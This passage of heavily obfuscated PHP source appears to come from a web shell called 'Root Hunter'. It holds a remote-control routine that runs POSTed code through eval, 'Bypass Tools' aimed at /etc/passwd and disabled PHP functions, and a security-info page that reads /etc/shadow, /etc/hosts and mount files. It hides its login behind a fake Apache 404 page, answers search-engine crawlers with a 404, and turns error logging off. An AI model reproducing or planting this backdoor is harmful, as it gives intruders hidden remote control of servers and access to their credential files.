"\74\x62\x72\x3e\x3c\x63\x65\156\164\x65\x72\76\x20\40\x3c\x69\x66\162\x61\x6d\145\40\x66\x72\x61\155\x65\102\157\x72\144\x65\162\75\60\x20\x73\162\x63\75\47\77\165\163\145\x72\x27\40\x77\x69\144\164\150\x3d\47\71\x30\x30\47\40\x68\x65\x69\x67\x68\164\x3d\x27\64\60\x30\x27\76\74\57\x69\x66\162\x61\x6d\x65\76\74\x2f\141\x3e";echo "\x3c\x2f\x64\x69\166\x3e";hardFooter();}goto abTW4;gn4fB:$asciifnc4=sha1(md5($_SERVER["\110\x54\124\120\x5f\125\x53\x45\122\137\101\107\x45\116\124"]));goto Cxc8F;WKUxM:function actionbypas(){hardHeader();echo "\x3c\x63\x65\x6e\164\x65\x72\x3e\x3c\150\61\76\x42\171\160\x61\163\163\x20\x54\x6f\157\154\163\74\57\x68\61\x3e\74\144\151\166\x20\x63\x6c\x61\163\x73\x3d\x63\157\156\x74\145\x6e\164\76\x3c\x62\x72\x3e";echo "\x3c\x74\150\x3e\74\x61\40\150\162\145\x66\75\x27\43\47\40\x6f\156\143\154\x69\143\153\75\x27\x67\50\42\x70\x61\x73\163\x77\42\x2c\x6e\165\154\x6c\54\42\x73\x5f\x6e\141\x6d\145\x5f".($sort[1]?0:1)."\x22\51\x27\76\x20\x5b\40\x42\x79\160\141\163\163\x3a\x20\x2f\145\x74\x63\x2f\x70\x61\163\163\167\x64\40\135\x20\x3c\57\141\x3e\x3c\57\x74\x68\76\x3c\160\x3e";echo "\x3c\x74\x68\76\x3c\x61\x20\150\x72\145\146\x3d\47\x23\x27\x20\157\x6e\143\154\151\143\153\75\x27\x67\x28\x22\144\x69\163\141\x62\x6c\145\42\54\156\x75\154\154\x2c\x22\x73\x5f\156\141\x6d\145\x5f".($sort[1]?0:1)."\42\x29\47\x3e\40\133\40\x42\x79\x70\141\163\x73\72\40\104\151\x73\142\141\x6c\x65\x64\40\x46\165\x6e\x63\x74\x69\157\x6e\163\40\135\40\x3c\x2f\141\x3e\74\x2f\x74\x68\x3e";echo "\74\x2f\x64\x69\166\76";hardFooter();}goto PxqVi;bLZtb:function actionRC(){if(!@$_POST["\x70\x31"]){$a=array("\x75\156\x61\155\145"=>php_uname(),"\x70\150\x70\137\x76\x65\x72\163\x69\x6f\x6e"=>phpversion(),"\x56\105\122\x53\x49\x4f\x4e"=>VERSION,"\x73\x61\x66\145\155\157\x64\145"=>@ini_get("\x73\x61\x66\x65\137\x6d\157\x64\145"));echo serialize($a);}else{eval($_POST["\x70\61"]);}}goto yV96F;ywNC9:$auth_pass5="\144\x38\63\67\145\62\142\141\63\143\65\x35\x30\x66\66\67\71\x31\x35\60\142\x65\x36\66\70\x38\62\143\67\143\64\67\146\x30\66\141\144\x62\63\x37";goto RSlVA;Of1wl:if(!function_exists("\160\157\x73\151\170\x5f\147\x65\164\x67\162\x67\151\144")&&strpos($GLOBALS["\144\x69\x73\x61\x62\154\x65\137\146\x75\156\x63\x74\x69\157\156\x73"],"\x70\157\x73\151\x78\137\147\145\164\147\162\147\x69\x64")===false){function posix_getgrgid($p){return false;}}goto W8DS5;Zs2Nm:ini_set("\154\157\x67\x5f\145\162\x72\157\162\163",0);goto BOvTm;AXSyi:if(!empty($auth_pass5)){if(isset($_POST[$keyxx])and sha1(md5($_POST[$keyxx]))==$auth_pass5){prototype(sha1(md5($_SERVER["\x48\124\124\x50\137\x48\117\x53\124"])),$auth_pass5);}if(!isset($_COOKIE[sha1(md5($_SERVER["\110\124\x54\x50\x5f\x48\117\123\x54"]))])||$_COOKIE[sha1(md5($_SERVER["\110\124\x54\120\137\110\117\123\x54"]))]!=$auth_pass5){printLoginx();}}goto ExF9C;ztzEK:function generateRandomString($length=10){$characters="\x30\x31\x32\63\x34\65\x36\67\70\x39\141\x62\x63\144\145\x66\147\x68\151\x6a\153\154\x6d\156\157\160\161\x72\x73\164\165\x76\167\x78\x79\x7a\101\102\x43\104\105\x46\107\110\x49\x4a\x4b\x4c\115\x4e\117\120\121\122\x53\124\125\x56\x57\x58\131\x5a";$charactersLength=strlen($characters);$randomString='';for($i=0;$i<$length;$i++){$randomString.=$characters[rand(0,$charactersLength-1)];}return $randomString;}goto ywNC9;sww2V:function actionSecInfo(){hardHeader();echo "\x3c\150\61\x3e\123\145\x72\x76\x65\x72\x20\x73\145\143\x75\x72\x69\x74\x79\40\151\x6e\x66\157\162\x6d\141\164\x69\157\x6e\x3c\57\x68\61\x3e\74\144\x69\x76\40\x63\x6c\141\x73\163\75\x63\157\x6e\164\145\x6e\164\76";function showSecParam($n,$v){$v=trim($v);if($v){echo "\x3c\163\x70\x61\x6e\76".$n."\x3a\x20\74\57\163\x70\141\156\76";if(strpos($v,"\xa")===false){echo $v."\x3c\x62\x72\76";}else{echo "\x3c\160\x72\145\40\x63\x6c\141\x73\163\x3d\155\x6c\61\x3e".$v."\74\x2f\x70\x72\145\x3e";}}}showSecParam("\123\145\162\166\x65\162\x20\163\157\x66\x74\167\x61\162\145",@getenv("\123\105\x52\126\105\x52\x5f\x53\x4f\x46\x54\x57\101\122\x45"));if(function_exists("\141\160\x61\x63\x68\145\137\147\x65\x74\137\x6d\157\144\165\154\145\163")){showSecParam("\114\157\141\144\145\144\x20\101\160\x61\143\150\x65\40\x6d\157\x64\165\x6c\145\163",implode("\x2c\x20",apache_get_modules()));}showSecParam("\x44\151\x73\x61\142\x6c\145\x64\40\120\110\120\40\106\165\156\143\x74\x69\157\x6e\x73",$GLOBALS["\x64\151\163\x61\x62\154\x65\x5f\x66\x75\156\143\164\151\x6f\x6e\x73"]?$GLOBALS["\x64\x69\163\x61\142\154\x65\137\x66\165\156\143\164\x69\157\x6e\163"]:"\x6e\157\156\x65");showSecParam("\x4f\160\x65\156\x20\x62\141\163\x65\40\144\151\x72",@ini_get("\x6f\x70\x65\x6e\137\142\x61\163\145\x64\151\x72"));showSecParam("\123\141\x66\x65\40\155\157\144\x65\x20\x65\x78\145\143\x20\144\x69\162",@ini_get("\x73\141\146\x65\x5f\155\x6f\x64\x65\137\145\170\x65\x63\x5f\x64\151\162"));showSecParam("\x53\141\x66\145\x20\155\x6f\x64\145\x20\151\156\143\154\x75\144\x65\x20\x64\x69\x72",@ini_get("\163\x61\146\145\137\x6d\x6f\x64\145\137\151\x6e\143\154\x75\x64\x65\137\x64\x69\162"));showSecParam("\x63\125\x52\x4c\x20\163\165\x70\160\x6f\x72\x74",function_exists("\143\x75\162\x6c\137\x76\145\162\163\x69\157\x6e")?"\145\156\x61\142\154\x65\144":"\x6e\157");$temp=array();if(function_exists("\155\x79\163\161\x6c\x5f\147\145\164\x5f\143\x6c\x69\x65\156\x74\x5f\x69\x6e\x66\157")){$temp[]="\115\x79\123\161\x6c\40\x28".mysql_get_client_info()."\x29";}if(function_exists("\x6d\163\163\161\x6c\137\x63\x6f\156\156\x65\x63\164")){$temp[]="\x4d\x53\123\121\114";}if(function_exists("\160\147\x5f\x63\157\156\x6e\145\143\164")){$temp[]="\x50\157\163\x74\x67\x72\x65\x53\x51\x4c";}if(function_exists("\x6f\x63\x69\x5f\143\x6f\x6e\x6e\x65\143\x74")){$temp[]="\117\x72\141\x63\154\145";}showSecParam("\x53\x75\x70\160\157\x72\164\145\144\x20\x64\x61\x74\141\x62\x61\163\145\163",implode("\54\x20",$temp));echo "\x3c\x62\x72\x3e";if($GLOBALS["\157\163"]=="\x6e\151\170"){showSecParam("\122\145\141\x64\x61\x62\154\145\x20\x2f\x65\164\143\57\x70\x61\x73\x73\167\x64",@is_readable("\x2f\x65\164\x63\57\160\141\163\163\x77\x64")?"\171\145\x73\x20\74\x61\40\150\162\x65\x66\x3d\47\43\47\40\157\x6e\143\154\151\x63\153\75\47\147\50\42\x46\x69\x6c\x65\163\x54\157\x6f\154\163\x22\54\40\42\x2f\145\x74\x63\x2f\x22\x2c\x20\42\x70\x61\163\x73\x77\x64\42\51\47\x3e\x5b\x76\x69\145\167\x5d\x3c\57\141\x3e":"\x6e\157");showSecParam("\x52\x65\x61\144\x61\x62\x6c\x65\x20\57\145\164\143\57\163\150\x61\144\157\167",@is_readable("\57\145\164\x63\57\x73\x68\141\x64\157\x77")?"\x79\145\x73\40\x3c\141\x20\x68\x72\x65\146\x3d\x27\x23\x27\40\157\x6e\143\154\x69\143\x6b\75\47\x67\50\x22\x46\x69\x6c\x65\x73\x54\x6f\157\x6c\x73\42\x2c\40\x22\x2f\145\164\143\x2f\x22\x2c\x20\42\x73\150\x61\x64\x6f\x77\x22\x29\47\x3e\x5b\x76\x69\x65\x77\135\x3c\57\x61\76":"\156\x6f");showSecParam("\117\x53\40\166\x65\x72\x73\x69\157\x6e",@file_get_contents("\57\160\x72\157\143\x2f\x76\145\162\163\151\157\x6e"));showSecParam("\104\x69\163\x74\162\40\156\141\155\145",@file_get_contents("\57\145\164\143\57\x69\163\x73\x75\145\x2e\156\x65\164"));if(!$GLOBALS["\x73\141\146\145\x5f\x6d\x6f\144\145"]){$userful=array("\147\143\x63","\154\143\x63","\x63\x63","\154\144","\155\141\x6b\x65","\160\150\160","\x70\x65\162\x6c","\160\171\x74\x68\x6f\156","\162\x75\x62\x79","\164\141\x72","\x67\172\x69\160","\x62\x7a\x69\160","\142\172\x69\160\62","\156\143","\154\157\143\x61\x74\145","\163\165\151\x64\160\x65\x72\x6c");$danger=array("\153\141\166","\x6e\157\x64\63\62","\x62\144\143\x6f\162\x65\x64","\x75\x76\163\x63\x61\x6e","\x73\x61\166","\x64\162\167\145\x62\144","\x63\x6c\x61\155\144","\162\153\x68\x75\156\164\x65\x72","\x63\150\x6b\x72\157\157\x74\x6b\151\x74","\x69\x70\164\141\142\x6c\x65\x73","\x69\x70\146\167","\164\x72\x69\x70\x77\x69\162\x65","\163\x68\151\145\x6c\x64\x63\x63","\x70\x6f\162\164\x73\145\156\x74\162\171","\163\x6e\x6f\x72\x74","\x6f\x73\163\145\143","\154\x69\144\x73\x61\x64\155","\x74\143\160\x6c\157\x64\x67","\x73\170\x69\144","\154\157\x67\143\x68\x65\143\153","\x6c\x6f\x67\x77\141\x74\x63\x68","\x73\171\x73\155\x61\163\x6b","\x7a\x6d\x62\x73\x63\x61\160","\x73\x61\x77\x6d\151\154\x6c","\167\157\x72\155\163\x63\x61\156","\156\151\156\x6a\141");$downloaders=array("\x77\x67\x65\164","\x66\x65\164\143\x68","\154\171\156\x78","\154\x69\x6e\153\x73","\143\x75\x72\154","\147\145\x74","\154\167\160\55\155\151\162\162\x6f\162");echo "\x3c\142\x72\x3e";$temp=array();foreach($userful as $asciifnc6){if(which($asciifnc6)){$temp[]=$asciifnc6;}}showSecParam("\x55\163\145\x72\146\x75\x6c",implode("\x2c\40",$temp));$temp=array();foreach($danger as $asciifnc6){if(which($asciifnc6)){$temp[]=$asciifnc6;}}showSecParam("\x44\141\x6e\147\x65\162",implode("\54\x20",$temp));$temp=array();foreach($downloaders as $asciifnc6){if(which($asciifnc6)){$temp[]=$asciifnc6;}}showSecParam("\x44\157\167\156\x6c\157\x61\x64\x65\162\x73",implode("\x2c\40",$temp));echo "\74\142\162\57\x3e";showSecParam("\110\x44\104\x20\163\x70\x61\x63\145",ex("\x64\146\x20\x2d\x68"));showSecParam("\x48\157\163\164\x73",@file_get_contents("\57\x65\164\143\57\150\157\163\164\x73"));showSecParam("\x4d\x6f\165\156\x74\x20\x6f\160\x74\x69\x6f\156\x73",@file_get_contents("\57\145\x74\x63\57\x66\x73\164\141\142"));}}else{showSecParam("\x4f\x53\x20\126\x65\162\163\151\x6f\156",ex("\x76\145\162"));showSecParam("\x41\143\x63\157\x75\156\164\40\x53\145\164\x74\151\x6e\147\163",iconv("\103\120\70\66\66","\x55\124\x46\x2d\70",ex("\156\x65\x74\x20\141\x63\143\x6f\165\x6e\x74\163")));showSecParam("\125\x73\145\162\x20\x41\143\x63\x6f\165\156\x74\163",iconv("\x43\x50\70\x36\66","\125\124\106\x2d\70",ex("\156\145\164\x20\165\x73\x65\162")));}echo "\74\x2f\144\151\x76\76";hardFooter();}goto B09fV;uVFz3:error_reporting(0);goto qJRtx;zA5El:function printLoginx(){if(!empty($_SERVER["\110\x54\124\120\x5f\x55\123\x45\x52\x5f\101\107\x45\116\x54"])){$userAgents=array("\107\x6f\157\x67\154\145","\x53\154\x75\x72\160","\x4d\123\x4e\x42\157\x74","\151\x61\137\141\x72\143\150\151\166\145\162","\131\x61\x6e\x64\x65\x78","\x52\141\x6d\142\x6c\x65\x72");if(preg_match("\57".implode("\174",$userAgents)."\57\151",$_SERVER["\x48\x54\124\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\116\124"])){header("\110\x54\124\120\57\61\56\60\40\64\60\64\40\x4e\x6f\x74\40\x46\157\x75\x6e\144");die;}}die("\x3c\x21\104\x4f\103\124\x59\x50\x45\x20\x68\164\155\x6c\x3e\x3c\x68\x74\x6d\x6c\76\74\150\x65\x61\144\x3e\74\x6d\x65\x74\x61\40\156\141\x6d\x65\x3d\42\x72\157\142\x6f\x74\163\x22\x20\x63\x6f\x6e\x74\145\156\164\42\156\157\151\x6e\x64\145\170\56\40\156\x6f\x66\x6f\154\x6c\157\x77\x22\76\x3c\164\151\164\154\145\76\64\x30\x34\x20\x4e\157\164\40\106\157\165\x6e\144\74\57\164\151\x74\154\145\x3e\x3c\57\x68\x65\141\144\76\x3c\142\x6f\144\x79\76\12\11\x3c\x68\x31\x3e\x4e\157\x74\40\106\157\x75\156\144\x3c\x2f\x68\61\76\40\12\x9\40\x20\x20\x20\74\x74\151\164\154\145\76\x34\x30\64\x20\x4e\x6f\164\40\106\157\x75\x6e\144\74\x2f\x74\151\164\154\x65\x3e\xa\x9\x3c\x73\x74\x79\154\x65\40\164\x79\x70\x65\75\x22\x74\x65\170\164\x2f\x63\163\163\42\76\12\x9\151\156\160\x75\x74\133\x74\x79\160\x65\x3d\x70\141\163\x73\x77\157\162\144\x5d\x20\173\12\11\x20\x20\x20\x20\167\151\144\x74\x68\x3a\x20\x32\65\60\160\170\x3b\xa\x9\40\x20\x20\40\x68\145\151\147\150\x74\72\x20\62\x35\x70\170\x3b\12\x9\40\x20\x20\40\x63\x6f\x6c\157\162\72\40\167\x68\151\x74\145\73\12\11\x20\40\x20\x20\x62\141\143\x6b\147\162\x6f\165\156\x64\x3a\40\164\x72\141\x6e\x73\x70\x61\162\x65\x6e\x74\73\12\x9\x20\40\x20\40\142\157\162\144\x65\162\72\x20\x31\x70\x78\40\163\x6f\154\151\x64\40\x77\150\151\164\x65\x3b\xa\x9\40\x20\x20\x20\x6d\x61\x72\147\x69\x6e\x2d\154\145\146\x74\x3a\40\62\60\160\170\73\xa\11\40\40\40\x20\164\145\170\164\55\141\x6c\x69\147\x6e\x3a\x20\143\145\156\164\x65\x72\73\12\11\175\xa\x9\74\x2f\x73\x74\x79\x6c\145\76\12\11\40\40\x20\x20\74\x70\76\x54\x68\145\x20\162\x65\x71\165\x65\163\x74\145\144\x20\125\x52\114\40\x77\141\163\40\x6e\x6f\164\x20\x66\157\165\156\144\x20\x6f\x6e\40\164\150\151\163\40\x73\x65\162\166\145\162\56\x3c\57\x70\76\x20\12\11\74\x70\76\101\x64\x64\x69\164\x69\157\156\141\x6c\x6c\x79\x2c\40\141\x20\x34\60\64\40\x4e\157\x74\40\106\x6f\165\x6e\144\40\145\162\162\157\x72\40\x77\141\x73\40\x65\x6e\x63\157\165\156\x74\145\162\145\144\x20\167\150\x69\154\145\x20\164\x72\171\x69\156\147\40\x74\x6f\40\x75\x73\145\x20\141\156\x20\x45\x72\162\157\162\x44\x6f\143\x75\x6d\x65\x6e\x74\x20\x74\157\40\x68\141\156\144\x6c\x65\40\x74\x68\x65\40\162\145\x71\x75\145\x73\x74\56\74\57\x70\76\40\xa\11\x3c\x68\x72\x3e\x20\12\11\74\141\144\x64\x72\x65\x73\x73\x3e\101\160\x61\x63\150\x65\x20\123\x65\162\x76\145\162\x20\x61\164\40".$_SERVER["\x48\124\124\120\137\x48\x4f\x53\124"]."\40\x50\x6f\x72\164\x20".$_SERVER["\123\x45\x52\x56\x45\x52\x5f\x50\x4f\122\124"]."\x3c\57\141\144\144\x72\x65\x73\163\76\x20\12\xa\11\x3c\x63\x65\x6e\x74\x65\162\x3e\74\x66\157\x72\155\x20\155\145\164\x68\x6f\x64\x3d\x22\x70\157\163\x74\x22\76\x3c\x69\x6e\x70\165\x74\40\164\171\160\145\75\x22\x70\x61\163\163\167\x6f\162\x64\42\x20\156\x61\x6d\x65\x3d\42".$_SESSION["\153\145\x79\170\x78"]."\42\x20\141\x75\x74\157\x63\x6f\x6d\x70\154\145\x74\x65\x3d\42\157\146\146\42\x3e\x3c\142\x72\x3e\74\x2f\146\157\x72\x6d\x3e\74\57\143\x65\x6e\x74\145\x72\76\74\57\x62\x6f\x64\x79\76\x3c\x2f\x68\x74\155\x6c\76\12\x9");}goto IHn50;hKElW:if(!empty($_POST["\141"])&&function_exists("\x61\143\x74\151\157\x6e".$_POST["\x61"])){call_user_func("\x61\143\x74\151\157\x6e".$_POST["\x61"]);}goto TODUM;Bxufz:function hardScandir($dir){if(function_exists("\x73\143\x61\x6e\144\x69\162")){return scandir($dir);}else{$dh=opendir($dir);while(false!==($filename=readdir($dh))){$files[]=$filename;}return $files;}}goto GoQMc;BzF5d:if(empty($_POST["\x61"])){if(isset($asciifnc3)&&function_exists("\141\143\x74\151\x6f\x6e".$asciifnc3)){$_POST["\141"]=$asciifnc3;}else{$_POST["\x61"]="\x46\x69\154\145\x73\x4d\x61\x6e";}}goto hKElW;HaRXp:function hardHeader(){if(empty($_POST["\x63\150\141\162\x73\145\x74"])){$_POST["\x63\150\141\162\x73\145\x74"]=$GLOBALS["\x61\x73\143\x69\151\x66\x6e\143\62"];}echo "\x3c\150\164\x6d\154\76\x3c\x68\145\x61\144\x3e\74\155\x65\164\141\x20\x68\164\164\x70\55\x65\161\165\x69\166\x3d\x27\x43\157\x6e\x74\x65\156\x74\55\124\x79\160\x65\47\x20\143\x6f\x6e\x74\145\156\x74\x3d\47\x74\145\170\164\57\x68\x74\155\154\73\x20\143\x68\141\162\x73\145\164\x3d".$_POST["\x63\150\141\x72\163\x65\164"]."\x27\x3e\xa\x3c\x74\151\x74\154\x65\x3e\x52\157\157\164\x20\110\x75\156\x74\145\162\x3c\57\x74\x69\x74\x6c\145\76\12\x3c\155\145\164\141\40\156\x61\155\145\75\x22\x72\x6f\x62\x6f\164\x73\x22\40\143\x6f\x6e\164\145\156\x74\75\x22\x6e\157\x69\x6e\144\145\x78\x2c\156\157\x66\157\x6c\154\x6f\x77\54\156\x6f\141\x72\143\150\151\x76\x65\42\40\57\x3e\xa\x3c\163\x63\162\151\160\164\x20\163\162\143\75\42\x68\x74\164\160\x73\x3a\x2f\x2f\143\x64\156\56\152\x73\x64\x65\x6c\x69\166\162\56\156\145\164\57\x6e\x70\x6d\x2f\x70\141\143\x65\x2d\152\x73\x40\x6c\141\164\145\x73\x74\57\160\141\143\145\56\x6d\x69\x6e\56\x6a\x73\42\x3e\x3c\x2f\x73\143\162\x69\x70\x74\76\xa\74\x6c\x69\156\153\x20\162\x65\154\x3d\x22\163\150\x6f\x72\x74\x63\165\164\x20\151\143\157\156\x22\x20\x68\162\145\146\x3d\x22\x68\164\164\160\163\72\57\x2f\146\157\x72\x75\155\x2e\x65\163\56\157\x67\x61\x6d\x65\56\147\x61\x6d\145\x66\157\x72\147\145\56\x63\x6f\155\57\x69\x6d\141\x67\145\x73\57\x61\166\x61\x74\141\x72\x73\57\x65\61\57\61\63\60\x31\55\x65\61\x64\67\143\x62\141\143\x31\61\x63\66\x30\145\70\63\63\x62\65\x35\141\x66\64\x36\67\142\x34\63\141\x39\64\65\x39\x63\60\x39\65\71\x62\65\x2e\160\x6e\147\42\x3e\12\74\154\151\156\153\x20\x68\162\145\146\75\47\x68\164\164\160\x73\72\57\x2f\x66\x6f\156\x74\163\x2e\147\157\x6f\x67\x6c\145\141\x70\x69\x73\56\x63\157\155\57\143\x73\x73\77\x66\x61\x6d\x69\154\171\x3d\117\x70\145\156\53\123\141\x6e\x73\47\x20\162\145\x6c\x3d\47\163\x74\x79\x6c\145\x73\150\x65\145\x74\x27\76\xa\x3c\163\164\x79\x6c\145\76\x62\x6f\x64\x79\173\x62\141\x63\153\147\x72\157\x75\156\144\55\x63\x6f\154\x6f\162\x3a\x23\x30\x36\x30\x61\61\x30\73\x63\x6f\x6c\157\162\72\x23\145\61\145\61\145\61\73\155\141\x72\x67\x69\156\72\60\x3b\146\x6f\x6e\164\x3a\156\x6f\162\x6d\141\x6c\x20\67\x35\45\40\101\162\151\141\154\x2c\110\x65\x6c\x76\x65\164\151\143\x61\54\x73\141\156\x73\55\163\x65\x72\151\146\x7d\x63\141\156\x76\x61\x73\x7b\144\151\163\160\154\141\171\x3a\142\x6c\x6f\x63\153\x3b\x76\x65\162\x74\x69\143\x61\x6c\x2d\141\154\151\147\156\x3a\x62\x6f\164\164\157\x6d\x7d\43\160\x61\162\164\151\x63\x6c\145\163\x2d\x6a\x73\x7b\167\x69\144\x74\150\x3a\x31\x30\60\45\x3b\150\145\x69\x67\x68\164\x3a\61\x30\60\x70\x78\x3b\x62\x61\143\153\x67\162\157\165\156\144\55\x63\157\154\157\x72\72\43\60\x36\60\x61\61\60\x3b\x62\141\143\153\x67\162\x6f\165\x6e\144\x2d\151\155\x61\x67\145\72\x75\x72\x6c\50\47\47\x29\73\142\x61\x63\153\x67\162\157\165\156\144\x2d\x72\145\x70\x65\141\164\72\156\157\x2d\162\x65\x70\x65\x61\x74\73\142\141\143\153\147\x72\157\x75\x6e\x64\55\x73\x69\x7a\x65\x3a\x63\157\166\145\162\73\142\141\143\x6b\147\162\157\165\x6e\x64\55\x70\157\163\151\164\151\x6f\x6e\x3a\65\60\x25\x20\65\x30\x25\x7d\142\157\144\171\x2c\164\144\54\164\150\173\x66\x6f\156\x74\x3a\x31\x30\x70\164\40\164\141\x68\x6f\x6d\x61\x2c\141\162\151\x61\x6c\54\x76\145\162\x64\141\156\141\x2c\x73\x61\156\x73\55\163\145\162\x69\x66\54\114\165\143\151\x64\141\40\x53\141\x6e\163\x3b\x6d\141\x72\x67\151\x6e\x3a\60\73\166\145\162\164\x69\x63\141\x6c\55\141\154\151\x67\x6e\x3a\164\157\x70\175\x74\141\x62\154\x65\x2e\151\156\146\x6f\x7b\143\x6f\154\157\x72\x3a\43\143\x33\x63\x33\143\63\175\x74\141\x62\x6c\x65\43\164\157\157\154\163\x54\x62\154\173\142\141\x63\x6b\x67\162\x6f\165\x6e\144\x2d\x63\x6f\x6c\157\x72\72\x23\60\x36\60\x61\x31\x30\x7d\141\x2c\150\x31\54\x73\160\x61\156\x7b\x63\157\154\157\162\72\43\x66\146\146\x21\151\155\160\157\x72\x74\x61\x6e\x74\175\163\160\141\156\x7b\x66\x6f\156\164\55\x77\x65\x69\x67\x68\x74\x3a\142\157\x6c\x64\145\162\x7d\x68\61\x7b\142\157\162\x64\x65\162\x2d\x6c\x65\146\x74\72\x35\x70\x78\x20\163\157\154\151\x64\x20\x23\71\143\x39\70\x32\145\73\x70\141\144\x64\x69\x6e\x67\72\62\160\170\x20\x35\x70\170\x3b\x66\157\x6e\164\72\61\64\x70\x74\40\126\x65\x72\144\x61\x6e\x61\x3b\142\141\143\153\147\162\157\x75\x6e\144\55\143\157\x6c\157\x72\x3a\43\x31\x30\61\65\x31\x63\x3b\x6d\141\162\147\151\x6e\72\60\x7d\144\x69\x76\x2e\143\157\156\x74\145\156\x74\x7b\160\x61\x64\144\151\156\x67\x3a\x35\160\170\x3b\x6d\x61\162\x67\x69\x6e\x2d\154\x65\146\164\x3a\x35\160\170\73\142\x61\x63\153\x67\162\x6f\165\156\x64\55\x63\x6f\154\157\162\72\43\x30\66\60\141\x31\60\x7d\x61\173\x74\x65\x78\x74\x2d\144\145\143\157\162\141\164\x69\x6f\156\x3a\x6e\x6f\156\x65\175\x61\x3a\150\x6f\166\145\x72\173\164\145\x78\164\x2d\144\145\143\157\x72\141\x74\151\157\x6e\72\x75\x6e\144\x65\x72\x6c\151\x6e\x65\x3b\143\x6f\x6c\157\162\x3a\x23\146\x66\144\142\x35\146\41\x69\x6d\160\157\x72\164\141\156\164\x7d\x2e\164\157\157\x6c\164\x69\x70\x3a\72\141\x66\x74\x65\162\173\x62\x61\143\153\x67\162\157\x75\x6e\144\x3a\43\60\x36\66\63\144\x35\x3b\x63\157\x6c\157\162\x3a\x23\x66\146\146\x3b\x63\157\156\x74\x65\156\x74\x3a\141\x74\164\x72\50\144\x61\x74\141\x2d\164\x6f\157\x6c\164\x69\160\51\x3b\155\x61\162\x67\x69\156\55\164\157\x70\x3a\55\x35\60\x70\x78\73\144\x69\x73\x70\x6c\x61\171\x3a\x62\x6c\x6f\x63\x6b\73\x70\141\144\144\151\156\147\x3a\x36\x70\x78\40\x31\x30\x70\x78\x3b\160\x6f\163\x69\164\x69\157\156\72\x61\142\163\157\x6c\165\164\145\73\x76\x69\x73\151\142\x69\154\151\164\171\72\x68\x69\x64\144\x65\156\175\56\x74\x6f\157\x6c\164\151\160\72\x68\157\x76\x65\x72\x3a\72\x61\146\164\145\x72\173\x6f\160\141\x63\x69\164\x79\x3a\61\x3b\166\151\163\x69\x62\x69\154\x69\x74\x79\x3a\x76\151\163\x69\x62\x6c\145\175\x2e\x6d\154\x31\x7b\x62\157\x72\x64\x65\x72\x3a\x31\x70\170\40\x73\157\x6c\151\x64\40\x23\62\x30\x32\70\63\x32\73\160\141\x64\144\151\156\147\x3a\x35\160\170\x3b\155\x61\162\x67\151\x6e\x3a\x30\x3b\x6f\166\145\162\x66\154\x6f\x77\x3a\x61\165\164\157\175\56\x62\x69\147\141\x72\x65\141\173\x6d\x69\156\x2d\167\151\144\x74\150\x3a\x31\x30\x30\45\x3b\x6d\x61\x78\55\167\x69\x64\x74\150\72\61\x30\60\x25\73\150\145\x69\x67\x68\164\72\x34\x30\60\x70\170\x7d\56\x73\x6d\x61\154\154\173\x6d\x69\x6e\55\x77\151\x64\x74\150\72\x31\60\x30\45\73\155\x61\x78\x2d\x77\x69\144\x74\150\x3a\61\x30\x30\45\x3b\x68\145\151\147\150\164\x3a\61\60\60\160\x78\175\x69\156\x70\x75\164\54\x73\x65\x6c\145\x63\164\x2c\164\x65\x78\x74\x61\x72\145\141\173\x6d\141\x72\x67\x69\156\x3a\x30\x3b\143\x6f\154\157\162\72\x23\x66\x66\x66\x3b\x62\141\143\x6b\x67\162\x6f\x75\x6e\x64\x2d\x63\x6f\x6c\x6f\162\x3a\x23\62\x30\62\x38\63\x32\x3b\142\x6f\x72\x64\145\162\x3a\x6e\157\x6e\x65\73\146\x6f\156\164\72\x39\160\164\40\103\x6f\165\x72\x69\x65\x72\x20\116\x65\x77\x3b\157\x75\164\154\x69\x6e\145\x3a\x30\x7d\x6c\x61\142\145\x6c\x7b\x70\157\163\x69\164\x69\157\x6e\x3a\162\145\x6c\x61\x74\x69\x76\x65\175\x6c\141\142\145\x6c\x3a\141\146\164\145\162\x7b\x63\x6f\x6e\x74\145\156\164\72\x27\x3c\76\x27\73\146\157\x6e\x74\x3a\x31\x30\160\x78\40\103\157\x6e\x73\x6f\x6c\141\163\54\155\x6f\156\x6f\x73\x70\141\143\145\x3b\x63\157\154\x6f\x72\72\43\x66\146\146\73\x2d\x77\145\x62\153\151\x74\55\164\x72\x61\156\x73\146\x6f\x72\x6d\72\162\x6f\164\141\164\145\50\71\x30\144\145\147\51\x3b\55\155\157\172\x2d\x74\x72\x61\156\x73\146\x6f\x72\155\x3a\162\x6f\x74\141\x74\x65\x28\x39\x30\x64\145\x67\x29\73\x2d\155\x73\55\x74\162\141\156\x73\146\x6f\162\x6d\72\162\157\164\141\164\x65\50\71\x30\x64\145\147\51\73\x74\x72\141\156\x73\146\x6f\x72\155\x3a\x72\157\164\141\164\145\x28\71\x30\x64\x65\147\51\73\x72\151\147\150\x74\72\63\x70\x78\73\x74\x6f\x70\x3a\x33\160\170\73\160\x61\x64\144\x69\156\147\x3a\60\73\x70\157\163\x69\164\151\157\156\72\141\142\x73\x6f\154\165\164\145\x3b\160\x6f\x69\x6e\164\145\162\55\x65\x76\145\x6e\164\163\72\x6e\x6f\156\145\x7d\154\x61\x62\145\x6c\72\x62\x65\x66\157\162\x65\173\x63\x6f\156\x74\x65\156\x74\x3a\x27\47\x3b\162\151\147\150\x74\72\60\x3b\x74\157\160\x3a\60\x3b\167\151\x64\x74\x68\x3a\61\67\160\x78\x3b\x68\145\x69\147\150\x74\x3a\61\x37\x70\x78\73\142\141\143\153\147\162\157\165\x6e\144\72\43\x32\60\62\x38\63\62\73\160\x6f\x73\151\x74\x69\x6f\x6e\72\x61\142\x73\157\154\165\x74\x65\73\160\x6f\x69\x6e\164\x65\162\x2d\145\x76\145\156\x74\x73\72\156\x6f\156\x65\x3b\144\x69\163\x70\x6c\141\171\x3a\142\x6c\x6f\x63\x6b\175\146\157\x72\x6d\x7b\x6d\x61\162\147\x69\x6e\72\x30\175\x23\x74\x6f\x6f\x6c\163\124\142\154\173\164\145\x78\164\x2d\141\154\151\x67\x6e\72\x63\x65\156\x74\x65\162\175\x23\x66\141\x6b\173\x62\141\x63\153\x67\x72\x6f\x75\156\144\72\x30\40\60\175\x23\x66\141\153\x20\x74\x64\x7b\160\141\x64\x64\151\x6e\x67\x3a\x35\x70\170\40\x30\40\60\x20\x30\x7d\151\x66\162\x61\x6d\145\x7b\x62\157\x72\x64\145\162\72\x31\x70\170\40\x73\x6f\x6c\x69\x64\x20\x23\x30\x36\x30\141\61\60\175\56\x74\157\157\154\163\x49\156\x70\x7b\167\x69\144\164\x68\72\x33\x30\x30\x70\170\x7d\